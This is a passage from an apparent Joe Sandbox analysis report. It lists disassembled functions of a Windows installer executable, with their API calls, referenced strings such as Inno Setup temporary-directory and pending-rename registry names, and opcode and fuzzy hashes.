                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetLastError.KERNEL32(00000057,00000000,0045CF38,?,?,?,?,00000000), ref: 0045CED7
                                                                                                                                                                      • SetLastError.KERNEL32(00000000,00000002,?,?,?,0045CFA4,?,00000000,0045CF38,?,?,?,?,00000000), ref: 0045CF16
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast
                                                                                                                                                                      • String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
                                                                                                                                                                      • API String ID: 1452528299-1580325520
                                                                                                                                                                      • Opcode ID: 76cc67341227ff3c05617fb08029e3d04d7592c217e5ac47b77cb7a8c66e2160
                                                                                                                                                                      • Instruction ID: 04ddcdc8736abbc18e914b4e1455ed0448250d7d0c77fa2ba5441d80ccfd4ce1
                                                                                                                                                                      • Opcode Fuzzy Hash: 76cc67341227ff3c05617fb08029e3d04d7592c217e5ac47b77cb7a8c66e2160
                                                                                                                                                                      • Instruction Fuzzy Hash: C7118736204304FFDB11DA91C9C2AAEB69EDB44746F6040776D00967C3D67C9F0AE56D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0041BD84 Relevance: 9.1, APIs: 6, Instructions: 71COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetSystemMetrics.USER32(0000000B), ref: 0041BDCD
                                                                                                                                                                      • GetSystemMetrics.USER32(0000000C), ref: 0041BDD7
                                                                                                                                                                      • 7406A670.USER32(00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BDE1
                                                                                                                                                                      • 74074720.GDI32(00000000,0000000E,00000000,0041BE54,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE08
                                                                                                                                                                      • 74074720.GDI32(00000000,0000000C,00000000,0000000E,00000000,0041BE54,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE15
                                                                                                                                                                      • 7406A580.USER32(00000000,00000000,0041BE5B,0000000E,00000000,0041BE54,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE4E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: 740674074720MetricsSystem$A580A670
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1309049930-0
                                                                                                                                                                      • Opcode ID: b7d5d08e3e19f48413646ae1536af481ff140cf83ce15b3b4f218d501696187d
                                                                                                                                                                      • Instruction ID: 747e2eb1a3f7a7c841cace1b59abe43854f3131f67fff351bf4eed9cd228abed
                                                                                                                                                                      • Opcode Fuzzy Hash: b7d5d08e3e19f48413646ae1536af481ff140cf83ce15b3b4f218d501696187d
                                                                                                                                                                      • Instruction Fuzzy Hash: 98215974E00748AFEB10EFA9C942BEEBBB4EB48714F10842AF514B7280D7785D40CB69
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00413634 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetWindowLongA.USER32(?,000000FC,?), ref: 0041365C
                                                                                                                                                                      • GetWindowLongA.USER32(?,000000F0), ref: 00413667
                                                                                                                                                                      • GetWindowLongA.USER32(?,000000F4), ref: 00413679
                                                                                                                                                                      • SetWindowLongA.USER32(?,000000F4,?), ref: 0041368C
                                                                                                                                                                      • SetPropA.USER32(?,00000000,00000000), ref: 004136A3
                                                                                                                                                                      • SetPropA.USER32(?,00000000,00000000), ref: 004136BA
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LongWindow$Prop
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3887896539-0
                                                                                                                                                                      • Opcode ID: 45c1895276da90ba0030b8fba909c80b6c0b360e03c75fbe878fc1f19dddecee
                                                                                                                                                                      • Instruction ID: 2f0da8c2a639c8e1c6f1513ac1b217b7872104ca576cf6b7b6160f367be9faf8
                                                                                                                                                                      • Opcode Fuzzy Hash: 45c1895276da90ba0030b8fba909c80b6c0b360e03c75fbe878fc1f19dddecee
                                                                                                                                                                      • Instruction Fuzzy Hash: 8C11B775100244BFEF00DF9DDC84EDA37A8EB19364F144666B958DB2A2D738D9908B68
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00401A90 Relevance: 9.1, APIs: 6, Instructions: 59COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,00401B68), ref: 00401ABD
                                                                                                                                                                      • LocalFree.KERNEL32(006A2588,00000000,00401B68), ref: 00401ACF
                                                                                                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000,006A2588,00000000,00401B68), ref: 00401AEE
                                                                                                                                                                      • LocalFree.KERNEL32(006A3588,?,00000000,00008000,006A2588,00000000,00401B68), ref: 00401B2D
                                                                                                                                                                      • RtlLeaveCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B58
                                                                                                                                                                      • RtlDeleteCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B62
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3782394904-0
                                                                                                                                                                      • Opcode ID: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                                                                                                                      • Instruction ID: 79795942c165c44483fb09e1962e32eaca51f8de38df00e9c029d8aa05623ce8
                                                                                                                                                                      • Opcode Fuzzy Hash: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                                                                                                                      • Instruction Fuzzy Hash: 3B118E30A003405AEB15AB65BE85B263BA5D761B08F44407BF80067BF3D77C5850E7AE
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0047DDA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetWindowLongA.USER32(?,000000EC), ref: 0047DDAE
                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0046CB69), ref: 0047DDD4
                                                                                                                                                                      • GetWindowLongA.USER32(?,000000EC), ref: 0047DDE4
                                                                                                                                                                      • SetWindowLongA.USER32(?,000000EC,00000000), ref: 0047DE05
                                                                                                                                                                      • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 0047DE19
                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 0047DE35
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$Long$Show
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3609083571-0
                                                                                                                                                                      • Opcode ID: 69fb56ec72bb48bf799d73a9f514c3e84a97c3b26dbd79650f0c817e19817d20
                                                                                                                                                                      • Instruction ID: 8d1f2698ea79badf96abf755c5a3f857121e06e6ffc739f26560ae4cefe558a1
                                                                                                                                                                      • Opcode Fuzzy Hash: 69fb56ec72bb48bf799d73a9f514c3e84a97c3b26dbd79650f0c817e19817d20
                                                                                                                                                                      • Instruction Fuzzy Hash: CA0112B5651610ABE700D768DE45F7637E8AF1C324F094266B659DF3E3C738E8408B49
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0041B268 Relevance: 9.0, APIs: 6, Instructions: 43COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0041A6D8: CreateBrushIndirect.GDI32 ref: 0041A743
                                                                                                                                                                      • UnrealizeObject.GDI32(00000000), ref: 0041B274
                                                                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0041B286
                                                                                                                                                                      • SetBkColor.GDI32(?,00000000), ref: 0041B2A9
                                                                                                                                                                      • SetBkMode.GDI32(?,00000002), ref: 0041B2B4
                                                                                                                                                                      • SetBkColor.GDI32(?,00000000), ref: 0041B2CF
                                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 0041B2DA
                                                                                                                                                                        • Part of subcall function 0041A050: GetSysColor.USER32(?), ref: 0041A05A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3527656728-0
                                                                                                                                                                      • Opcode ID: 040caad6ebeb90478066d2bb7b9115770ac54e43de5888fa90ff69ea82d38fb6
                                                                                                                                                                      • Instruction ID: 416fc8ddf3b290ca22d08e3f0d0fa9d59de125dbf6d826fc2ec32e7be4b681d8
                                                                                                                                                                      • Opcode Fuzzy Hash: 040caad6ebeb90478066d2bb7b9115770ac54e43de5888fa90ff69ea82d38fb6
                                                                                                                                                                      • Instruction Fuzzy Hash: 15F072B56015009FDF00FFAAD9C6E5F67989F043197048456B948DF197C93DD8505B3A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00471F5C Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 263fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • FindNextFileA.KERNEL32(000000FF,?,00000000,0047212D,?,00000000,?,0049C1D0,00000000,004722FB,?,00000000,?,00000000,?,004724C9), ref: 00472109
                                                                                                                                                                      • FindClose.KERNEL32(000000FF,00472134,0047212D,?,00000000,?,0049C1D0,00000000,004722FB,?,00000000,?,00000000,?,004724C9,?), ref: 00472127
                                                                                                                                                                      • FindNextFileA.KERNEL32(000000FF,?,00000000,0047224F,?,00000000,?,0049C1D0,00000000,004722FB,?,00000000,?,00000000,?,004724C9), ref: 0047222B
                                                                                                                                                                      • FindClose.KERNEL32(000000FF,00472256,0047224F,?,00000000,?,0049C1D0,00000000,004722FB,?,00000000,?,00000000,?,004724C9,?), ref: 00472249
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Find$CloseFileNext
                                                                                                                                                                      • String ID: p%G
                                                                                                                                                                      • API String ID: 2066263336-2885399958
                                                                                                                                                                      • Opcode ID: fe3d700a77f0c70e558164dbe9874417de2c5de180e0cff2a5a2022d274441ab
                                                                                                                                                                      • Instruction ID: c5c343863c2eea904beb919c2ff7085193d8c56025a8159f133c7515c1d415d1
                                                                                                                                                                      • Opcode Fuzzy Hash: fe3d700a77f0c70e558164dbe9874417de2c5de180e0cff2a5a2022d274441ab
                                                                                                                                                                      • Instruction Fuzzy Hash: F4B12B3490424D9FCF11DFA5C981ADEBBB9FF49304F5081AAE908B3251D7789A46CF68
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004556AC Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 142registryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00455843,?,00000000,00455883), ref: 00455789
                                                                                                                                                                      Strings
                                                                                                                                                                      • PendingFileRenameOperations2, xrefs: 00455758
                                                                                                                                                                      • PendingFileRenameOperations, xrefs: 00455728
                                                                                                                                                                      • WININIT.INI, xrefs: 004557B8
                                                                                                                                                                      • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 0045570C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseOpen
                                                                                                                                                                      • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
                                                                                                                                                                      • API String ID: 47109696-2199428270
                                                                                                                                                                      • Opcode ID: 243847fca82b2f7a01168ef53ce8d6e7db58038c51670d16328d2ce42af76573
                                                                                                                                                                      • Instruction ID: 0b70bbd74ac5003506c3e48668489f2f7adcdad68ca58941e5d407b4478d915f
                                                                                                                                                                      • Opcode Fuzzy Hash: 243847fca82b2f7a01168ef53ce8d6e7db58038c51670d16328d2ce42af76573
                                                                                                                                                                      • Instruction Fuzzy Hash: 0C518430E006489FDB10EF61DC51AEEB7B9EF44305F50857BE804A7292DB78AE49CA58
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0047C378 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 101COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0047C4CE,?,?,00000000,0049B628,00000000,00000000,?,00497A45,00000000,00497BEE,?,00000000), ref: 0047C40B
                                                                                                                                                                      • GetLastError.KERNEL32(00000000,00000000,00000000,0047C4CE,?,?,00000000,0049B628,00000000,00000000,?,00497A45,00000000,00497BEE,?,00000000), ref: 0047C414
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                                                                                                      • String ID: Created temporary directory: $\_setup64.tmp$_isetup
                                                                                                                                                                      • API String ID: 1375471231-2952887711
                                                                                                                                                                      • Opcode ID: 18d6a976f0e2b14fb29252ef16b0a625fec03e849b725e3cac77dbcbc074c8a1
                                                                                                                                                                      • Instruction ID: d537758c7117fefc82ee858029cb7c27e5ed8caa62090c64dc1ceeedb24f0412
                                                                                                                                                                      • Opcode Fuzzy Hash: 18d6a976f0e2b14fb29252ef16b0a625fec03e849b725e3cac77dbcbc074c8a1
                                                                                                                                                                      • Instruction Fuzzy Hash: A0411774A001099BCB01EFA5C892ADEB7B5EF44305F50857BE814B7392DB38AE058B6D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00453890 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 100fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,-cI,_iu,?,00000000,004539CA), ref: 0045397F
                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,-cI,_iu,?,00000000,004539CA), ref: 0045398F
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseCreateFileHandle
                                                                                                                                                                      • String ID: -cI$.tmp$_iu
                                                                                                                                                                      • API String ID: 3498533004-3964432171
                                                                                                                                                                      • Opcode ID: 02fc6949860a742288c4963694ea4c9fb07eaa5c322dedd883b179278d380901
                                                                                                                                                                      • Instruction ID: 987f34639f2954820d3a171204f3ba7a53f2c28fb23a6faa943e541cb6d42ed5
                                                                                                                                                                      • Opcode Fuzzy Hash: 02fc6949860a742288c4963694ea4c9fb07eaa5c322dedd883b179278d380901
                                                                                                                                                                      • Instruction Fuzzy Hash: 293195B0A00249ABCB11EFA5C942BAEBBB4AF44309F60456AF800B73C2D6785F059758
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00497268 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 97COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004242BC: SetWindowTextA.USER32(?,00000000), ref: 004242D4
                                                                                                                                                                      • ShowWindow.USER32(?,00000005,00000000,004974CD,?,?,00000000), ref: 0049729E
                                                                                                                                                                        • Part of subcall function 0042D8BC: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8CF
                                                                                                                                                                        • Part of subcall function 00407298: SetCurrentDirectoryA.KERNEL32(00000000,?,004972C6,00000000,00497499,?,?,00000005,00000000,004974CD,?,?,00000000), ref: 004072A3
                                                                                                                                                                        • Part of subcall function 0042D444: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4D2,?,?,?,00000001,?,00456052,00000000,004560BA), ref: 0042D479
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                                                                                                                                      • String ID: .dat$.msg$IMsg$Uninstall
                                                                                                                                                                      • API String ID: 3312786188-1660910688
                                                                                                                                                                      • Opcode ID: 52ca20c050fb53b6c3f30dab896956d15df98098ab9dc4c53d05683d8c74a12a
                                                                                                                                                                      • Instruction ID: 502499af6c4fed57a8803849289841afdffa1b87ef326e8d9c35a034d288349d
                                                                                                                                                                      • Opcode Fuzzy Hash: 52ca20c050fb53b6c3f30dab896956d15df98098ab9dc4c53d05683d8c74a12a
                                                                                                                                                                      • Instruction Fuzzy Hash: 20317574A10214AFCB01EF65DC92D5E7BB5FB88318B51847AF800AB792D739BD05CB58
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0042EAA0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042EAD2
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EAD8
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042EB01
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.3833739610.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.3833573894.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834353043.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834548802.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3834891544.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000012.00000002.3835780052.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_18_2_400000_78A4.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressByteCharHandleModuleMultiProcWide
                                                                                                                                                                      • String ID: ShutdownBlockReasonCreate$user32.dll
